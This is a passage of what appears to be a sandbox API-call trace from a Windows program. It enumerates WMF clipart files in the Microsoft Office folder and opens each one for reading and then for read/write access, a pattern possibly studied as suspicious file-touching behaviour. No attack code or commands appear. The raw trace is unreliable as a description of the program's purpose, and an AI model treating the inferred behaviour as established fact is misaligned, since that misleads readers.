nFileSizeLow=0xac4)) returned 1 [0101.225] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8ab20 | out: hHeap=0x20000) returned 1 [0101.225] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf20 | out: hHeap=0x20000) returned 1 [0101.225] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cef0 | out: hHeap=0x20000) returned 1 [0101.225] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d580 | out: hHeap=0x20000) returned 1 [0101.225] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0101.225] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0101.225] FindNextFileW (in: hFindFile=0x78610, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xcbf13fd, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xcbf13fd, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xcc3d96c, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x1ccc, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="AN01545_.WMF", cAlternateFileName="")) returned 1 [0101.225] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0101.225] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0101.225] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0101.225] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0101.225] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0101.225] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0101.225] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0101.225] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0101.225] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cef0 [0101.225] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x35250 [0101.225] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cef0 | out: hHeap=0x20000) returned 1 [0101.225] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x35250 | out: hHeap=0x20000) returned 1 [0101.225] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cef0 [0101.225] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x35230 [0101.225] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cef0 | out: hHeap=0x20000) returned 1 [0101.225] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x35230 | out: hHeap=0x20000) returned 1 [0101.225] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0101.225] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75eb8 [0101.226] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0101.226] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa6) returned 0x60348 [0101.226] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75eb8 | out: hHeap=0x20000) returned 1 [0101.265] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0101.265] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x90) returned 0x8a828 [0101.265] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x60348 | out: hHeap=0x20000) returned 1 [0101.265] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0101.265] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0101.265] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0101.265] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0101.265] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8a828 | out: hHeap=0x20000) returned 1 [0101.265] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0101.267] AreFileApisANSI () returned 1 [0101.267] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN01545_.WMF", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN01545_.WMF", lpUsedDefaultChar=0x0) returned 69 [0101.267] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d528 [0101.267] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0101.267] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0101.267] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cef0 [0101.272] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d010 [0101.272] AreFileApisANSI () returned 1 [0101.272] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d528, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 69 [0101.279] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8a) returned 0x8ace8 [0101.279] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d528, cbMultiByte=-1, lpWideCharStr=0x8ace8, cchWideChar=69 | out: lpWideCharStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN01545_.WMF") returned 69 [0101.280] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN01545_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\an01545_.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x33c [0101.280] GetFileType (hFile=0x33c) returned 0x1 [0101.284] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8ace8 | out: hHeap=0x20000) returned 1 [0101.286] SetFilePointerEx (in: hFile=0x33c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5e8 | out: lpNewFilePointer=0x0) returned 1 [0101.287] SetFilePointerEx (in: hFile=0x33c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f59c | out: lpNewFilePointer=0x0) returned 1 [0101.288] SetFilePointerEx (in: hFile=0x33c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5b4 | out: lpNewFilePointer=0x0) returned 1 [0101.315] CloseHandle (hObject=0x33c) returned 1 [0101.316] AreFileApisANSI () returned 1 [0101.316] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d528, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 69 [0101.316] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8a) returned 0x8a368 [0101.316] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d528, cbMultiByte=-1, lpWideCharStr=0x8a368, cchWideChar=69 | out: lpWideCharStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN01545_.WMF") returned 69 [0101.316] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN01545_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\an01545_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x33c [0101.316] GetFileType (hFile=0x33c) returned 0x1 [0101.316] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8a368 | out: hHeap=0x20000) returned 1 [0101.316] CloseHandle (hObject=0x33c) returned 1 [0101.316] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0101.316] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0101.316] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0101.316] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88428 [0101.316] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0101.317] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0101.317] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0101.317] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4de00 [0101.317] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e228 [0101.317] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e0a0 [0101.317] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e030 [0101.317] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e0a0 | out: hHeap=0x20000) returned 1 [0101.317] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e228 | out: hHeap=0x20000) returned 1 [0101.317] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88428 | out: hHeap=0x20000) returned 1 [0101.317] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4de00 | out: hHeap=0x20000) returned 1 [0101.317] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e030 | out: hHeap=0x20000) returned 1 [0101.317] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0101.317] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0101.317] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0101.317] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0101.317] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0101.317] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0101.317] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0101.317] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88428 [0101.317] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0101.317] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0101.317] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0101.317] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0101.317] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0101.317] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0101.317] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88428 | out: hHeap=0x20000) returned 1 [0101.317] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0101.317] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0101.317] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0101.317] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0101.317] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887c0 [0101.317] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0101.317] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0101.318] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0101.318] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0101.318] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887c0 | out: hHeap=0x20000) returned 1 [0101.318] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0101.318] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0101.318] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0101.318] AreFileApisANSI () returned 1 [0101.318] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d528, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 69 [0101.318] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8a) returned 0x8a368 [0101.318] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d528, cbMultiByte=-1, lpWideCharStr=0x8a368, cchWideChar=69 | out: lpWideCharStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN01545_.WMF") returned 69 [0101.318] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN01545_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\an01545_.wmf"), fInfoLevelId=0x0, lpFileInformation=0x313f6c0 | out: lpFileInformation=0x313f6c0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xcbf13fd, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xcbf13fd, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xcc3d96c, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x1ccc)) returned 1 [0101.318] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8a368 | out: hHeap=0x20000) returned 1 [0101.318] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d010 | out: hHeap=0x20000) returned 1 [0101.318] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cef0 | out: hHeap=0x20000) returned 1 [0101.318] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d528 | out: hHeap=0x20000) returned 1 [0101.318] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0101.318] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0101.318] FindNextFileW (in: hFindFile=0x78610, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xcc63b1c, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xcc63b1c, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xccaffc4, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x1d74, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="AN02122_.WMF", cAlternateFileName="")) returned 1 [0101.318] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887c0 [0101.318] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0101.318] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0101.318] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0101.318] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0101.318] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0101.318] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887c0 | out: hHeap=0x20000) returned 1 [0101.318] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0101.318] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cef0 [0101.318] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x34ff0 [0101.318] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cef0 | out: hHeap=0x20000) returned 1 [0101.318] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x34ff0 | out: hHeap=0x20000) returned 1 [0101.318] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cef0 [0101.319] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x35210 [0101.319] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cef0 | out: hHeap=0x20000) returned 1 [0101.319] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x35210 | out: hHeap=0x20000) returned 1 [0101.319] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0101.319] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75fa8 [0101.319] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88428 [0101.319] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa6) returned 0x60088 [0101.319] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75fa8 | out: hHeap=0x20000) returned 1 [0101.319] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88428 | out: hHeap=0x20000) returned 1 [0101.319] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x90) returned 0x8aeb0 [0101.319] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x60088 | out: hHeap=0x20000) returned 1 [0101.319] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0101.319] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0101.319] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0101.319] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0101.319] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8aeb0 | out: hHeap=0x20000) returned 1 [0101.319] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0101.319] AreFileApisANSI () returned 1 [0101.319] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN02122_.WMF", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN02122_.WMF", lpUsedDefaultChar=0x0) returned 69 [0101.319] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d528 [0101.319] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0101.319] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0101.319] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf20 [0101.319] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cfc0 [0101.319] AreFileApisANSI () returned 1 [0101.319] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d528, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 69 [0101.319] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8a) returned 0x8a530 [0101.319] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d528, cbMultiByte=-1, lpWideCharStr=0x8a530, cchWideChar=69 | out: lpWideCharStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN02122_.WMF") returned 69 [0101.320] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN02122_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\an02122_.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x33c [0101.320] GetFileType (hFile=0x33c) returned 0x1 [0101.321] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8a530 | out: hHeap=0x20000) returned 1 [0101.321] SetFilePointerEx (in: hFile=0x33c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5e8 | out: lpNewFilePointer=0x0) returned 1 [0101.321] SetFilePointerEx (in: hFile=0x33c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f59c | out: lpNewFilePointer=0x0) returned 1 [0101.321] SetFilePointerEx (in: hFile=0x33c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5b4 | out: lpNewFilePointer=0x0) returned 1 [0101.321] CloseHandle (hObject=0x33c) returned 1 [0101.321] AreFileApisANSI () returned 1 [0101.321] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d528, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 69 [0101.321] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8a) returned 0x8a530 [0101.321] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d528, cbMultiByte=-1, lpWideCharStr=0x8a530, cchWideChar=69 | out: lpWideCharStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN02122_.WMF") returned 69 [0101.321] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN02122_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\an02122_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x33c [0101.322] GetFileType (hFile=0x33c) returned 0x1 [0101.322] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8a530 | out: hHeap=0x20000) returned 1 [0101.322] CloseHandle (hObject=0x33c) returned 1 [0101.322] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0101.322] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0101.322] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88428 [0101.322] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0101.322] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88428 | out: hHeap=0x20000) returned 1 [0101.322] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0101.322] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0101.322] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df18 [0101.322] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df50 [0101.322] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e420 [0101.322] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e378 [0101.322] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e420 | out: hHeap=0x20000) returned 1 [0101.322] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df50 | out: hHeap=0x20000) returned 1 [0101.322] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0101.322] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df18 | out: hHeap=0x20000) returned 1 [0101.322] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e378 | out: hHeap=0x20000) returned 1 [0101.322] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0101.322] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0101.322] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887c0 [0101.322] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0101.322] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887c0 | out: hHeap=0x20000) returned 1 [0101.322] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0101.322] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0101.322] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0101.323] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0101.323] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0101.323] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88428 [0101.323] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0101.323] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0101.323] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0101.323] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0101.323] HeapFree (in: hHeap=0x20000, dwFlags=0x0, 